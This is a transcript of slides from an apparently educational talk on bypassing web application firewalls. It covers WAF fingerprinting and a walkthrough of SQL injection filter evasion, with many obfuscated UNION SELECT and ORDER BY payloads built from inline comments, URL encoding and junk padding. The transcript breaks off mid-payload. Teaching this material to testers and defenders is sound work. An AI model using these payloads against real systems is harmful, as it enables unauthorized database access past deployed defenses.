Waf bypassing Techniques

download Waf bypassing Techniques

of 47

  • date post

    16-Jan-2017
  • Category

    Education

  • view

    336
  • download

    4

Embed Size (px)

Transcript of Waf bypassing Techniques

WAF Bypassing Techniques

WAF BypassingTechniques

Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence IndiaBug Hunter on HackeroneCTF Author on Vulnhub.comSome exploits and PoC on Exploit-db as well.Passionate about Web Applications Security and Exploit Writing.

Agenda Introduction to Web Applications Firewalls Operation ModesVendors Fingerprinting WAFWays to Bypass WAFsPractical Cases for BypassingConclusion

Introduction to Web Application Firewalls Presents as Application LayerMonitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers based upon their pre-defined signatures in a database.Basic goal of WAF is to monitor and block the contents that violates pre-defined policy. These pre-defined policies are patterns of user input which ends up in potential attack.Understands HTTP and HTTPs traffic better than any traditional firewall.

4

Types of Operation Modes

Negative ModeA negative security model recognize attacks by relying on a database of expected attack signatures.Example:Do not allow in any page, any argument value (user input) which match potential XSS strings like ,, String.fromCharCode, etc.

Pros: Less time to implement.

Cons: Less protection.

Positive ModelA positive security model enforces positive behaviour by learning the application logic and the building a security policy of valid known requests as a user interacts with the application.Example:Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until 65535.Using intval conditions on page. (Accepts only integers)Pros: Better performance (less rules). Less false positives.Cons: Much more time to implement. Some vendors provide automatic learning mode, they help, but are far from perfect,in the end, you always need a skilled human to review the policies

Mix Model Combination of both positive and negative model.

Testing EnvironmentsGoogle ChromeMozilla FirefoxInternet ExplorerOpera Browser

ProductsF5 BIG IP WAFSucuriModsecurityImperva IncapsulaPHP-IDS (PHP Intrusion Detection System)Quick DefenseAQTRONIX WebKnight (For IIS and based on ISAPI filters)Barracuda WAF

ISAPI Filters are the dlls which are used to enhance the functionality of IIS server. It is only available on IIS servers 10

Fingerprinting WAFAdds Cookie to the HTTP Communication.For Citrix Netscaler WAF

Fingerprinting WAFF5 BIG IP ASM

Fingerprinting WAFOn the basis of HTTP Response Other WAFs may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.

Fingerprinting WAFResponse for BIG F5

Fingerprinting WAFRequest and Response for ModSecurity Firewall

Request:

Fingerprinting WAFRequest and Response for ModSecurity Firewall

Response:

Fingerprinting WAFResponse for WebKnight Firewall

Response:

Fingerprinting WAFResponse for WebKnight Firewall

Response rendered on Browser

Automatic Fingerprinting WAF Using Nmap Scripts

nmap -p80 --script http-waf-detect

Using WaFw00f.py

Python Wafw00f.py url

Techniques to Bypass WAFsBypassing WAF For SQL Injection VulnerabilitiesBypassing WAF for XSS IssuesBypassing WAF for LFI and RFI vulnerabilities.

General Techniques to bypass WAFNull Character InjectionMixed CaseInline CommentsChunked RequestsBuffer OverflowHTTP Parameter PollutionURL encoding Keyword SplittingReplaced KeywordsIgnoring CookiesUsing Data URIsHeader Injection

Bypassing WAF For SQL Injection Vulnerabilities

https://abc.com/index.php?id=1

Example 1 (Without WAF)You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6Example 1 (With WAF)https://abc.com/index.php?id=1

HTTP/1.1 403 Forbidden ErrorOrHTTP/1.1 406 Not AcceptableorHTTP/1.1 404 Not FoundOrHTTP/1.1 500 Internal Server ErrorOrHTTP/1.1 400 Bad Request

Some recon on WAFCame to know Modsecurity is in action

https://abc.com/index.php?id=1

HTTP/1.1 200 OKhttps://abc.com/index.php?id=1

%27You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6This technique is URL EncodingSome time you need to use:Double URL Encoding :- %2527%27Triple URL Encoding:- %252525%2527%27 (This is very rare Case)

https://abc.com/index.php?id=1

%27 ORDER BY 1%23HTTP/1.1 403 Forbidden Assumptions in mindOrder keyword is Blocked ??Order by keyword is Blocked ??Any other alternative of Order by query ??Does Spaces are blockedLets Try

https://abc.com/index.php?id=1

%27 ORDER %23HTTP/1.1 403 Forbidden Assumptions in mindOrder keyword is BlockedCheck again order is blocked ??https://abc.com/index.php?id=1

%27ORDER%23HTTP/1.1 200 OK New Assumptions in mindOrder keyword is not Blocked What is blocked then ???SPACES ARE BLOCKED

https://abc.com/index.php?id=1

%27 ORDER by 1 %23HTTP/1.1 403 Forbidden https://abc.com/index.php?id=1

%27ORDERby1 %23HTTP/1.1 200 OK No Assumptions in mind

Because spaces are blocked only

27

Techniques to bypass spacesUsing + instead of space like:- order+by+1 (Mostly blocked)Using inline comments instead of spaces /**/ like:- order/**/by/**/1Using combination of inline comments and URL encoding instead of spaces like:Order/%2a%2a/by/%2a%2a/1Order%2f**%2fby%2f**%2f1Using combination of inline comments, URL encoding & Junk Characters instead of spaces like:Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1

Techniques to bypass spacesUsing white space characters %0a, %0b, %0c, %0d,%a0,%09,%01 Query will beORDER%0aby%0a1ORDER%0bby%0b1ORDER%0cby%0c1ORDER%0Dby%0D1ORDER%A0by%A01ORDER%0D%0Aby%0D%0A1

https://abc.com/index.php?id=1

%27/**/ORDER/**/by/**/1%23HTTP/1.1 200 OK Lets Suppose no. of columns are 3https://abc.com/index.php?id=1

%27 UNION SELECT 1,2,3%23HTTP/1.1 403 Forbidden Assumptions in mindSpaces are Blocked ??

30

https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/1,2,3%23HTTP/1.1 403 Forbidden Assumptions in mindSpaces were bypassed using inline comments..Still blocked???UNION keyword is blocked ??SELECT keyword is blocked ??Intergers are blocked ??Commas are blocked ?Combination of UNION SELECT is blockedSELECT with Integers are blocked

31

Techniques to BypassUsing Inline comments:/!*50000UNION*//*!40000UNION*//*!00000UNION*/

If UNION is blocked Using URL Encoding Techniques:%53nion%2553nion%55%4e%49%4f%4e (UNION)

Double URL Encoding

Triple URL Encoding

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23HTTP/1.1 403 Forbidden Assumptions in mindUNION keyword is blocked ??SELECT keyword is blocked ??Intergers are blocked ??Commas are blocked ?Combination of UNION SELECT is blockedSELECT with Integers are blocked

33

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23HTTP/1.1 403 Forbidden Assumptions in mindUNION keyword is blocked ??SELECT keyword is blocked ??Intergers are blocked ??Commas are blocked ?Combination of UNION SELECT is blockedSELECT with Integers are blocked

34

https://abc.com/index.php?id=1

%27/**//*!50000UNION*/1,2,3%23HTTP/1.1 200 OKhttps://abc.com/index.php?id=1

%27/**//*!50000SELECT*/1,2,3%23HTTP/1.1 200 OKAssumptions in mindUNION keyword is NOT blocked.SELECT keyword is NOT blocked.Intergers are NOT blocked Commas are NOT blocked Combination of UNION SELECT is blocked ?SELECT with Integers are NOT blocked

35

Techniques to bypass combination of union selectUsing combination of inline comments and URL encoding :/*!50000%55niOn*/ /*!50000%53eLECT*/Using white spaces and URL encoding of comments (#)

Union%23%0aSELECTUnion%23%0bSELECTUnion%23%0cSELECTUnion%23%0DSELECTUnion%23%A0SELECTUsing combination of inline comments and URL encoding :/*!50000%55niOn*/ /*!50000%53eLECT*/

Techniques to bypass combination of union selectUsing Buffer Overflow

UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECTSome time need to increase the junk as per the requirement

UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT

Techniques to bypass combination of union selectUsing Distinct statement UNION DISTINCT SELECTUsing Distinctrow statement UNION DISTINCTROW SELECT

https://abc.com/index.php?id=1

%27/**/UNION%23XXXXXXXXXXXXXXXXXXXXX